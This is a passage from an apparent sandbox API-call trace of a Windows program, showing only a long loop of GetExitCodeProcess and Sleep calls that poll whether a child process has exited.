lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0173.814] Sleep (dwMilliseconds=0x19) [0173.855] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0173.855] Sleep (dwMilliseconds=0x19) [0173.910] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0173.910] Sleep (dwMilliseconds=0x19) [0173.945] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0173.945] Sleep (dwMilliseconds=0x19) [0173.980] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0173.981] Sleep (dwMilliseconds=0x19) [0174.016] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0174.017] Sleep (dwMilliseconds=0x19) [0174.052] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0174.052] Sleep (dwMilliseconds=0x19) [0174.211] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0174.211] Sleep (dwMilliseconds=0x19) [0174.252] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0174.252] Sleep (dwMilliseconds=0x19) [0174.288] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0174.288] Sleep (dwMilliseconds=0x19) [0174.323] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0174.323] Sleep (dwMilliseconds=0x19) [0174.360] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0174.360] Sleep (dwMilliseconds=0x19) [0174.396] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0174.396] Sleep (dwMilliseconds=0x19) [0174.436] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0174.436] Sleep (dwMilliseconds=0x19) [0174.473] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0174.473] Sleep (dwMilliseconds=0x19) [0174.505] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0174.505] Sleep (dwMilliseconds=0x19) [0174.541] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0174.541] Sleep (dwMilliseconds=0x19) [0174.570] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0174.571] Sleep (dwMilliseconds=0x19) [0174.605] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0174.605] Sleep (dwMilliseconds=0x19) [0174.641] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0174.641] Sleep (dwMilliseconds=0x19) [0174.671] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0174.671] Sleep (dwMilliseconds=0x19) [0174.704] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0174.705] Sleep (dwMilliseconds=0x19) [0174.770] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0174.770] Sleep (dwMilliseconds=0x19) [0174.811] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0174.811] Sleep (dwMilliseconds=0x19) [0174.854] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0174.854] Sleep (dwMilliseconds=0x19) [0174.884] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0174.884] Sleep (dwMilliseconds=0x19) [0174.920] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0174.920] Sleep (dwMilliseconds=0x19) [0174.952] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0174.952] Sleep (dwMilliseconds=0x19) [0174.981] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0174.981] Sleep (dwMilliseconds=0x19) [0175.016] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0175.016] Sleep (dwMilliseconds=0x19) [0175.047] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0175.047] Sleep (dwMilliseconds=0x19) [0175.153] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0175.153] Sleep (dwMilliseconds=0x19) [0175.190] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0175.190] Sleep (dwMilliseconds=0x19) [0175.231] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0175.231] Sleep (dwMilliseconds=0x19) [0175.262] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0175.262] Sleep (dwMilliseconds=0x19) [0175.308] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0175.308] Sleep (dwMilliseconds=0x19) [0175.347] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0175.347] Sleep (dwMilliseconds=0x19) [0175.379] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0175.379] Sleep (dwMilliseconds=0x19) [0175.407] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0175.408] Sleep (dwMilliseconds=0x19) [0175.444] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0175.444] Sleep (dwMilliseconds=0x19) [0175.487] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0175.487] Sleep (dwMilliseconds=0x19) [0175.624] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0175.625] Sleep (dwMilliseconds=0x19) [0175.697] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0175.697] Sleep (dwMilliseconds=0x19) [0175.741] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0175.741] Sleep (dwMilliseconds=0x19) [0175.794] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0175.794] Sleep (dwMilliseconds=0x19) [0175.826] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0175.826] Sleep (dwMilliseconds=0x19) [0175.885] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0175.885] Sleep (dwMilliseconds=0x19) [0176.024] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0176.025] Sleep (dwMilliseconds=0x19) [0176.148] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0176.149] Sleep (dwMilliseconds=0x19) [0176.185] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0176.185] Sleep (dwMilliseconds=0x19) [0176.215] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0176.215] Sleep (dwMilliseconds=0x19) [0176.258] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0176.258] Sleep (dwMilliseconds=0x19) [0176.289] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0176.289] Sleep (dwMilliseconds=0x19) [0176.323] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0176.323] Sleep (dwMilliseconds=0x19) [0176.366] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0176.366] Sleep (dwMilliseconds=0x19) [0176.404] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0176.404] Sleep (dwMilliseconds=0x19) [0176.442] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0176.442] Sleep (dwMilliseconds=0x19) [0176.474] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0176.474] Sleep (dwMilliseconds=0x19) [0176.503] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0176.503] Sleep (dwMilliseconds=0x19) [0176.537] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0176.537] Sleep (dwMilliseconds=0x19) [0176.574] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0176.575] Sleep (dwMilliseconds=0x19) [0176.603] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0176.603] Sleep (dwMilliseconds=0x19) [0176.656] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0176.656] Sleep (dwMilliseconds=0x19) [0176.723] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0176.724] Sleep (dwMilliseconds=0x19) [0176.757] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0176.757] Sleep (dwMilliseconds=0x19) [0176.792] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0176.792] Sleep (dwMilliseconds=0x19) [0176.823] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0176.823] Sleep (dwMilliseconds=0x19) [0176.855] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0176.855] Sleep (dwMilliseconds=0x19) [0176.882] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0176.882] Sleep (dwMilliseconds=0x19) [0176.914] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0176.914] Sleep (dwMilliseconds=0x19) [0176.950] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0176.950] Sleep (dwMilliseconds=0x19) [0176.979] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0176.979] Sleep (dwMilliseconds=0x19) [0177.011] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0177.011] Sleep (dwMilliseconds=0x19) [0177.041] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0177.041] Sleep (dwMilliseconds=0x19) [0177.170] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0177.170] Sleep (dwMilliseconds=0x19) [0177.201] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0177.201] Sleep (dwMilliseconds=0x19) [0177.233] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0177.234] Sleep (dwMilliseconds=0x19) [0177.273] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0177.273] Sleep (dwMilliseconds=0x19) [0177.319] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0177.320] Sleep (dwMilliseconds=0x19) [0177.357] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0177.357] Sleep (dwMilliseconds=0x19) [0177.400] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0177.401] Sleep (dwMilliseconds=0x19) [0177.559] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0177.559] Sleep (dwMilliseconds=0x19) [0177.620] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0177.620] Sleep (dwMilliseconds=0x19) [0177.684] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0177.685] Sleep (dwMilliseconds=0x19) [0177.727] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0177.728] Sleep (dwMilliseconds=0x19) [0177.782] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0177.782] Sleep (dwMilliseconds=0x19) [0177.817] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0177.817] Sleep (dwMilliseconds=0x19) [0177.847] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0177.847] Sleep (dwMilliseconds=0x19) [0177.881] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0177.881] Sleep (dwMilliseconds=0x19) [0177.915] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0177.915] Sleep (dwMilliseconds=0x19) [0177.952] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0177.952] Sleep (dwMilliseconds=0x19) [0177.994] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0177.994] Sleep (dwMilliseconds=0x19) [0178.032] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0178.032] Sleep (dwMilliseconds=0x19) [0178.062] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0178.062] Sleep (dwMilliseconds=0x19) [0178.136] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0178.136] Sleep (dwMilliseconds=0x19) [0178.173] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0178.174] Sleep (dwMilliseconds=0x19) [0178.212] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0178.212] Sleep (dwMilliseconds=0x19) [0178.246] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0178.246] Sleep (dwMilliseconds=0x19) [0178.284] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0178.285] Sleep (dwMilliseconds=0x19) [0178.325] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0178.325] Sleep (dwMilliseconds=0x19) [0178.358] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0178.359] Sleep (dwMilliseconds=0x19) [0178.391] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0178.392] Sleep (dwMilliseconds=0x19) [0178.425] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0178.425] Sleep (dwMilliseconds=0x19) [0178.464] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0178.464] Sleep (dwMilliseconds=0x19) [0178.498] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0178.498] Sleep (dwMilliseconds=0x19) [0178.526] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0178.526] Sleep (dwMilliseconds=0x19) [0178.555] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0178.556] Sleep (dwMilliseconds=0x19) [0178.594] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0178.594] Sleep (dwMilliseconds=0x19) [0178.631] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0178.631] Sleep (dwMilliseconds=0x19) [0178.671] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0178.671] Sleep (dwMilliseconds=0x19) [0178.706] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0178.706] Sleep (dwMilliseconds=0x19) [0178.743] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0178.743] Sleep (dwMilliseconds=0x19) [0178.778] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0178.779] Sleep (dwMilliseconds=0x19) [0178.817] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0178.817] Sleep (dwMilliseconds=0x19) [0178.853] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0178.853] Sleep (dwMilliseconds=0x19) [0178.918] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0178.918] Sleep (dwMilliseconds=0x19) [0178.957] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0178.957] Sleep (dwMilliseconds=0x19) [0178.992] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0178.992] Sleep (dwMilliseconds=0x19) [0179.130] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0179.130] Sleep (dwMilliseconds=0x19) [0179.170] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0179.170] Sleep (dwMilliseconds=0x19) [0179.208] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0179.208] Sleep (dwMilliseconds=0x19) [0179.248] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0179.248] Sleep (dwMilliseconds=0x19) [0179.311] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0179.311] Sleep (dwMilliseconds=0x19) [0179.373] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0179.374] Sleep (dwMilliseconds=0x19) [0179.414] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0179.414] Sleep (dwMilliseconds=0x19) [0179.460] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0179.460] Sleep (dwMilliseconds=0x19) [0179.568] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0179.568] Sleep (dwMilliseconds=0x19) [0179.614] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0179.614] Sleep (dwMilliseconds=0x19) [0179.660] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0179.660] Sleep (dwMilliseconds=0x19) [0179.701] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0179.701] Sleep (dwMilliseconds=0x19) [0179.762] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0179.762] Sleep (dwMilliseconds=0x19) [0179.798] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0179.798] Sleep (dwMilliseconds=0x19) [0179.833] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0179.834] Sleep (dwMilliseconds=0x19) [0179.893] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0179.893] Sleep (dwMilliseconds=0x19) [0179.932] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0179.932] Sleep (dwMilliseconds=0x19) [0179.968] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0179.968] Sleep (dwMilliseconds=0x19) [0180.011] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0180.012] Sleep (dwMilliseconds=0x19) [0180.046] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0180.046] Sleep (dwMilliseconds=0x19) [0180.164] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0180.164] Sleep (dwMilliseconds=0x19) [0180.205] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0180.205] Sleep (dwMilliseconds=0x19) [0180.244] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0180.244] Sleep (dwMilliseconds=0x19) [0180.288] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0180.288] Sleep (dwMilliseconds=0x19) [0180.329] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0180.329] Sleep (dwMilliseconds=0x19) [0180.364] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0180.364] Sleep (dwMilliseconds=0x19) [0180.403] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0180.403] Sleep (dwMilliseconds=0x19) [0180.439] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0180.439] Sleep (dwMilliseconds=0x19) [0180.477] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0180.477] Sleep (dwMilliseconds=0x19) [0180.512] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0180.512] Sleep (dwMilliseconds=0x19) [0180.554] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0180.554] Sleep (dwMilliseconds=0x19) [0180.590] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0180.590] Sleep (dwMilliseconds=0x19) [0180.666] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0180.666] Sleep (dwMilliseconds=0x19) [0180.736] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0180.736] Sleep (dwMilliseconds=0x19) [0180.775] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0180.775] Sleep (dwMilliseconds=0x19) [0180.811] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0180.811] Sleep (dwMilliseconds=0x19) [0180.849] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0180.849] Sleep (dwMilliseconds=0x19) [0180.904] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0180.904] Sleep (dwMilliseconds=0x19) [0180.943] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0180.943] Sleep (dwMilliseconds=0x19) [0180.978] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0180.979] Sleep (dwMilliseconds=0x19) [0181.016] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0181.016] Sleep (dwMilliseconds=0x19) [0181.096] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0181.097] Sleep 